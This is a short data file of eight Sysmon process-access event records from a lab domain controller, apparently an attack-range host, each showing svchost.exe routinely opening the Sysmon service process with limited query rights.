{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
